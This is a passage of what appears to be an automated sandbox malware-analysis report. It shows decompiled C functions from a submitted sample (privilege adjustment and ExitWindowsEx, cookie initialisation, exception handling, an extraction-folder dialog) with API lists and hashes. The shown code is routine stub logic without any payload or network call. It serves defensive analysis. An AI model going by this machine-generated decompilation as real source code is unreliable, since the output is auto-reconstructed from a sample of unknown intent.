                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a41f90
                                                                                                                                                                                                                                            0x00a41f90
                                                                                                                                                                                                                                            0x00a41f93
                                                                                                                                                                                                                                            0x00a41f98
                                                                                                                                                                                                                                            0x00a41fa4
                                                                                                                                                                                                                                            0x00a41fa7
                                                                                                                                                                                                                                            0x00a41fc5
                                                                                                                                                                                                                                            0x00a41fcd
                                                                                                                                                                                                                                            0x00a41fdb
                                                                                                                                                                                                                                            0x00a41ee5
                                                                                                                                                                                                                                            0x00a41eea
                                                                                                                                                                                                                                            0x00a41ef1
                                                                                                                                                                                                                                            0x00a41ef4
                                                                                                                                                                                                                                            0x00a41f0c
                                                                                                                                                                                                                                            0x00a41f2e
                                                                                                                                                                                                                                            0x00a41f3a
                                                                                                                                                                                                                                            0x00a41f46
                                                                                                                                                                                                                                            0x00a41f4d
                                                                                                                                                                                                                                            0x00a41f58
                                                                                                                                                                                                                                            0x00a41f60
                                                                                                                                                                                                                                            0x00a41f61
                                                                                                                                                                                                                                            0x00a41f62
                                                                                                                                                                                                                                            0x00a41f75
                                                                                                                                                                                                                                            0x00a41f80
                                                                                                                                                                                                                                            0x00a41f77
                                                                                                                                                                                                                                            0x00a41f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41f77
                                                                                                                                                                                                                                            0x00a41f64
                                                                                                                                                                                                                                            0x00a41f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41f64
                                                                                                                                                                                                                                            0x00a41f0e
                                                                                                                                                                                                                                            0x00a41f0e
                                                                                                                                                                                                                                            0x00a41f13
                                                                                                                                                                                                                                            0x00a41f13
                                                                                                                                                                                                                                            0x00a41f14
                                                                                                                                                                                                                                            0x00a41f14
                                                                                                                                                                                                                                            0x00a41f16
                                                                                                                                                                                                                                            0x00a41f17
                                                                                                                                                                                                                                            0x00a41f1a
                                                                                                                                                                                                                                            0x00a41f1f
                                                                                                                                                                                                                                            0x00a41f1f
                                                                                                                                                                                                                                            0x00a41f86
                                                                                                                                                                                                                                            0x00a41f8f
                                                                                                                                                                                                                                            0x00a41fcf
                                                                                                                                                                                                                                            0x00a41fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41fd3
                                                                                                                                                                                                                                            0x00a41fa9
                                                                                                                                                                                                                                            0x00a41fb4
                                                                                                                                                                                                                                            0x00a41fbb
                                                                                                                                                                                                                                            0x00a41fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41fc3
                                                                                                                                                                                                                                            0x00a41f9a
                                                                                                                                                                                                                                            0x00a41f9a
                                                                                                                                                                                                                                            0x00a41fa2
                                                                                                                                                                                                                                            0x00a41fd9
                                                                                                                                                                                                                                            0x00a41fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A41EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A41F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00A41FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 2dd815afe7811a4cd7f3d9026e1a9a5f6cc53ec750e62908cf877d0cef950267
                                                                                                                                                                                                                                            • Instruction ID: ff8fe2553119d182c79606ff01d9b788503107e7cf3299140aaa71e28cec08a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dd815afe7811a4cd7f3d9026e1a9a5f6cc53ec750e62908cf877d0cef950267
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8021D67DB402056BDB209BE59C4AFBF76B8EBC6B50F20051AFA02D6181D77688879261
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A47155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa48004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa48004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa48008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a4715d
                                                                                                                                                                                                                                            0x00a47161
                                                                                                                                                                                                                                            0x00a47165
                                                                                                                                                                                                                                            0x00a47178
                                                                                                                                                                                                                                            0x00a47182
                                                                                                                                                                                                                                            0x00a4718e
                                                                                                                                                                                                                                            0x00a47197
                                                                                                                                                                                                                                            0x00a471a0
                                                                                                                                                                                                                                            0x00a471b1
                                                                                                                                                                                                                                            0x00a471b8
                                                                                                                                                                                                                                            0x00a471c4
                                                                                                                                                                                                                                            0x00a471c7
                                                                                                                                                                                                                                            0x00a471cb
                                                                                                                                                                                                                                            0x00a471d5
                                                                                                                                                                                                                                            0x00a471da
                                                                                                                                                                                                                                            0x00a471da
                                                                                                                                                                                                                                            0x00a471dc
                                                                                                                                                                                                                                            0x00a471dc
                                                                                                                                                                                                                                            0x00a471e2
                                                                                                                                                                                                                                            0x00a471e5
                                                                                                                                                                                                                                            0x00a471ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A47182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A47191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A4719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A471A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00A471B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 60df8fa0295388a449c5a16faab1b4140bdb1af21541a85ec44f175e3e63eea1
                                                                                                                                                                                                                                            • Instruction ID: 57069cc6e8d3f4e309482a7e33f542f664641190e6cea35ad75969819e7eff36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60df8fa0295388a449c5a16faab1b4140bdb1af21541a85ec44f175e3e63eea1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF114C7DD11208DFCB10DFF8EA48A9EB7F4EF9A310F614A55D806E7210EB359A058B41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A46CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a46cf7
                                                                                                                                                                                                                                            0x00a46d00
                                                                                                                                                                                                                                            0x00a46d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A46E26,00A41000), ref: 00A46CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A46E26,?,00A46E26,00A41000), ref: 00A46D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A46E26,00A41000), ref: 00A46D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A46E26,00A41000), ref: 00A46D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 8727498b77b3d2ebcecf652579a946cdc52304ed27fbb009fd46fc69e58f8931
                                                                                                                                                                                                                                            • Instruction ID: 89ba821ebabef6af494612e76d398dc86de0989d5337bb602e117b98629af98d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8727498b77b3d2ebcecf652579a946cdc52304ed27fbb009fd46fc69e58f8931
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD0C93E080108BBEB006BE9EC0CA593F28EBDA212F444104F31982020CA334452CB62
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A43210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E00A443D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0xa49a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa491e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E00A444B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0xa491e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0xa491e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0xa491e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0xa491e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E00A4658A(0xa491e4, 0x104, 0xa41140);
                                                                                                                                                                                                                                            								_t27 = E00A458C8(0xa491e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0xa491e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa491e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E00A4597D(0xa491e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa491e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa491e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E00A444B9(_t64, 0x54a, 0xa491e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0xa491e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0xa491e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0xa491e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0xa491e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0xa49a3c, 0x3e8, 0xa48598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A44224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa487a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A444B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a4321b
                                                                                                                                                                                                                                            0x00a4321e
                                                                                                                                                                                                                                            0x00a43221
                                                                                                                                                                                                                                            0x00a4343c
                                                                                                                                                                                                                                            0x00a4343e
                                                                                                                                                                                                                                            0x00a4343f
                                                                                                                                                                                                                                            0x00a43445
                                                                                                                                                                                                                                            0x00a43447
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43447
                                                                                                                                                                                                                                            0x00a43229
                                                                                                                                                                                                                                            0x00a4322a
                                                                                                                                                                                                                                            0x00a4322f
                                                                                                                                                                                                                                            0x00a433ec
                                                                                                                                                                                                                                            0x00a433f7
                                                                                                                                                                                                                                            0x00a43410
                                                                                                                                                                                                                                            0x00a43416
                                                                                                                                                                                                                                            0x00a4341d
                                                                                                                                                                                                                                            0x00a4342d
                                                                                                                                                                                                                                            0x00a4342d
                                                                                                                                                                                                                                            0x00a43438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43438
                                                                                                                                                                                                                                            0x00a43237
                                                                                                                                                                                                                                            0x00a43243
                                                                                                                                                                                                                                            0x00a43243
                                                                                                                                                                                                                                            0x00a43246
                                                                                                                                                                                                                                            0x00a432ee
                                                                                                                                                                                                                                            0x00a432f4
                                                                                                                                                                                                                                            0x00a432f6
                                                                                                                                                                                                                                            0x00a433d4
                                                                                                                                                                                                                                            0x00a433d6
                                                                                                                                                                                                                                            0x00a433db
                                                                                                                                                                                                                                            0x00a433dc
                                                                                                                                                                                                                                            0x00a433de
                                                                                                                                                                                                                                            0x00a433df
                                                                                                                                                                                                                                            0x00a43370
                                                                                                                                                                                                                                            0x00a43372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43372
                                                                                                                                                                                                                                            0x00a432fc
                                                                                                                                                                                                                                            0x00a43301
                                                                                                                                                                                                                                            0x00a43301
                                                                                                                                                                                                                                            0x00a43303
                                                                                                                                                                                                                                            0x00a43304
                                                                                                                                                                                                                                            0x00a43304
                                                                                                                                                                                                                                            0x00a4330a
                                                                                                                                                                                                                                            0x00a4330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43313
                                                                                                                                                                                                                                            0x00a43318
                                                                                                                                                                                                                                            0x00a4331a
                                                                                                                                                                                                                                            0x00a43331
                                                                                                                                                                                                                                            0x00a43332
                                                                                                                                                                                                                                            0x00a4333a
                                                                                                                                                                                                                                            0x00a4333d
                                                                                                                                                                                                                                            0x00a4337c
                                                                                                                                                                                                                                            0x00a43388
                                                                                                                                                                                                                                            0x00a4338f
                                                                                                                                                                                                                                            0x00a43394
                                                                                                                                                                                                                                            0x00a43396
                                                                                                                                                                                                                                            0x00a433a4
                                                                                                                                                                                                                                            0x00a433ab
                                                                                                                                                                                                                                            0x00a433b6
                                                                                                                                                                                                                                            0x00a433be
                                                                                                                                                                                                                                            0x00a433c3
                                                                                                                                                                                                                                            0x00a433c5
                                                                                                                                                                                                                                            0x00a43435
                                                                                                                                                                                                                                            0x00a43437
                                                                                                                                                                                                                                            0x00a43437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43437
                                                                                                                                                                                                                                            0x00a433c7
                                                                                                                                                                                                                                            0x00a433c9
                                                                                                                                                                                                                                            0x00a433cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a433cc
                                                                                                                                                                                                                                            0x00a433ad
                                                                                                                                                                                                                                            0x00a433b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a433b4
                                                                                                                                                                                                                                            0x00a43398
                                                                                                                                                                                                                                            0x00a43399
                                                                                                                                                                                                                                            0x00a4339b
                                                                                                                                                                                                                                            0x00a4339c
                                                                                                                                                                                                                                            0x00a4339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4339d
                                                                                                                                                                                                                                            0x00a4334c
                                                                                                                                                                                                                                            0x00a43351
                                                                                                                                                                                                                                            0x00a43354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4335c
                                                                                                                                                                                                                                            0x00a43362
                                                                                                                                                                                                                                            0x00a43364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43366
                                                                                                                                                                                                                                            0x00a43367
                                                                                                                                                                                                                                            0x00a43369
                                                                                                                                                                                                                                            0x00a4336a
                                                                                                                                                                                                                                            0x00a4336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4336b
                                                                                                                                                                                                                                            0x00a4331c
                                                                                                                                                                                                                                            0x00a43323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43329
                                                                                                                                                                                                                                            0x00a4332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4332b
                                                                                                                                                                                                                                            0x00a4324c
                                                                                                                                                                                                                                            0x00a4324c
                                                                                                                                                                                                                                            0x00a4324f
                                                                                                                                                                                                                                            0x00a432c8
                                                                                                                                                                                                                                            0x00a432ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432ce
                                                                                                                                                                                                                                            0x00a43251
                                                                                                                                                                                                                                            0x00a43256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43271
                                                                                                                                                                                                                                            0x00a43277
                                                                                                                                                                                                                                            0x00a43279
                                                                                                                                                                                                                                            0x00a43298
                                                                                                                                                                                                                                            0x00a4329d
                                                                                                                                                                                                                                            0x00a4329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432b0
                                                                                                                                                                                                                                            0x00a432b6
                                                                                                                                                                                                                                            0x00a432b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432be
                                                                                                                                                                                                                                            0x00a43280
                                                                                                                                                                                                                                            0x00a43289
                                                                                                                                                                                                                                            0x00a4328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4328e
                                                                                                                                                                                                                                            0x00a4327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4327b
